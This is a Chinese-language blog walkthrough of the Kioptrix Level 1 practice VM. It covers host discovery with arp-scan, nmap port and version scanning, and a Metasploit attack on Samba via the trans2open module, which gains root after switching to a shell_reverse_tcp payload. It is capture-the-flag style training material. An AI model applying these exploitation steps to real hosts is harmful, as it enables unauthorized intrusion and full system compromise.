当前位置: 首页 > news >正文

Kioptrix Level 1渗透测试

目标:取得靶机的root权限。

1.发现主机

  1. sudo arp-scan -l 扫描本地局域网内所有活跃主机。对比启动靶机前和启动靶机后的结果,确定靶机ip为10.0.2.7。
  2. 此外,可以用ping -c 3 10.0.2.7 向IP地址 10.0.2.7 发送3个ICMP回显请求包,测试与该主机的网络连通性,进一步确认是否为靶机。

ip addr 可以确定本机ip,此时为10.0.2.3

在这里插入图片描述

2.端口扫描

  1. nmap -p- 10.0.2.15 扫描靶机全部TCP端口,共65535个,耗时较长。
  2. nmap 10.0.2.15只扫描最常见的1000个TCP端口,速度较快。

nmap(Network Mapper)是网络管理员和渗透测试人员必备的工具,主要用于探索网络、检查安全状况以及识别网络上的设备和服务。

功能分类描述示例命令
主机发现找出网络中有哪些主机在线。nmap -sn 192.168.1.0/24
端口扫描找出目标主机上哪些端口是开放的。nmap 10.0.2.15
版本探测确定开放端口上运行的是什么软件及其版本号。nmap -sV 10.0.2.15
操作系统探测猜测目标主机运行的操作系统。nmap -O 10.0.2.15

在这里插入图片描述

3.端口服务扫描

nmap -p 22,80,111,139,443,32768 -sV 10.0.2.7,对探测到的端口进行版本探测。命令格式:nmap -p[端口,中间用逗号隔开] -sV 靶机ip ,-sV:进行版本探测(Version detection)。
由返回的结果可知,靶机端口版本非常老旧,存在很多漏洞,后面将以Samba作为突破点
在这里插入图片描述

4.使用Metasploit framework进行攻击

Metasploit Framework 是一个开源的渗透测试平台,也是目前全球最流行、最强大的网络安全工具之一。它提供了一套完整的工具集,让安全专业人员能够系统地测试和验证系统的安全性。

组件用途示例
Modules(模块)核心功能单元漏洞利用、载荷、辅助模块等
Payloads(载荷)攻击成功后执行的代码反向shell、Meterpreter等
Auxiliary(辅助)信息收集、扫描等端口扫描、服务识别等
Exploits(漏洞利用)利用特定漏洞的代码MS17-010(永恒之蓝)
Encoders(编码器)规避防病毒检测对载荷进行编码混淆
  1. msfconsole启动Metasploit framework
  2. search Samba搜索与Samba服务相关的模块,只用看exploit模块,最后选择exploit/linux/samba/trans2open模块
  3. use exploit/linux/samba/trans2open 启用该模块
  4. info查看该模块信息
  5. set rhosts 10.0.2.7设置目标主机的IP地址
  6. exploit进行攻击,没有成功。
    在这里插入图片描述

第二次尝试

更换payload,set payload linux/x86/shell_reverse_tcp (原来是linux/x86/meterpreter/reverse_tcp),成功进入并获得root权限。

shell_reverse_tcp:功能非常单一,就是建立一个反向Shell。代码量小,行为简单,稳定可靠。它只是简单地调用 /bin/sh 并将其输入/输出重定向到网络连接。
meterpreter :功能极其丰富。它需要在内存中注入一个复杂的DLL(或Linux下的共享库),建立加密通信,并加载一系列扩展功能模块(文件系统、网络、权限提升等)。任何一个环节出问题(如内存布局不兼容、特定系统调用被拦截、依赖缺失)都可能导致整个Payload失败。

在这里插入图片描述

http://www.dtcms.com/a/496581.html

相关文章:

  • 中国林业工程建设协会网站企业网站建设的提案
  • 用Vscode编译正点原子ESP32例程报错:ninja: error: loading ‘build.ninja‘: 系统找不到指定的文件
  • 温州专业微网站制作公司哪家好网站开发外包报价
  • 超星网站开发实战答案asp网站安全如何做
  • YOLOv3 核心笔记:多尺度特征融合与全面性能升级
  • 郑州建网站费用快照网站
  • LeetCode 刷题【123. 买卖股票的最佳时机 III】
  • 基于高通跃龙 QCS6490 平台的Sherpa快速部署
  • 赤峰网站建设 公司阿里云建设网站好不好
  • 个人网站备案需要哪些资料网站建立教学
  • 无锡网站制作电话邢台168交友最新信息
  • Termux 安装 PicList 图库服务,typora、obsidian写作一键上传图片到云端
  • 微信网站方案建筑企业资质加盟
  • 做网站多ui设计与网站建设
  • 数据结构——二十二、并查集(王道408)
  • 云网站功能32层建筑工期是
  • 程序+股票一年随笔
  • 手机网站制作费室内设计效果图图片
  • 【Luogu】P1972 [SDOI2009] HH 的项链 (树状数组求区间内不同数的个数)
  • 若依AI平台
  • 宁波网站建设设计制作.net 网站开发架构
  • 制作网站网络科技公司做seo对网站推广有什么作用
  • 软件测试基础知识与面试题总结
  • 河南高端网站建设随机图片网站
  • Orcad capture 元器件位号按顺序重排
  • 外贸行业网站建设公司排名企业集团网站建设
  • 400电话申请网站源码程序做网站公司不给源码
  • CFF Explorer: 一款Windows PE 文件分析的好工具
  • LINUX14 进程间的通信 - 管道
  • 徐州城乡建设局网站金山网站建设公司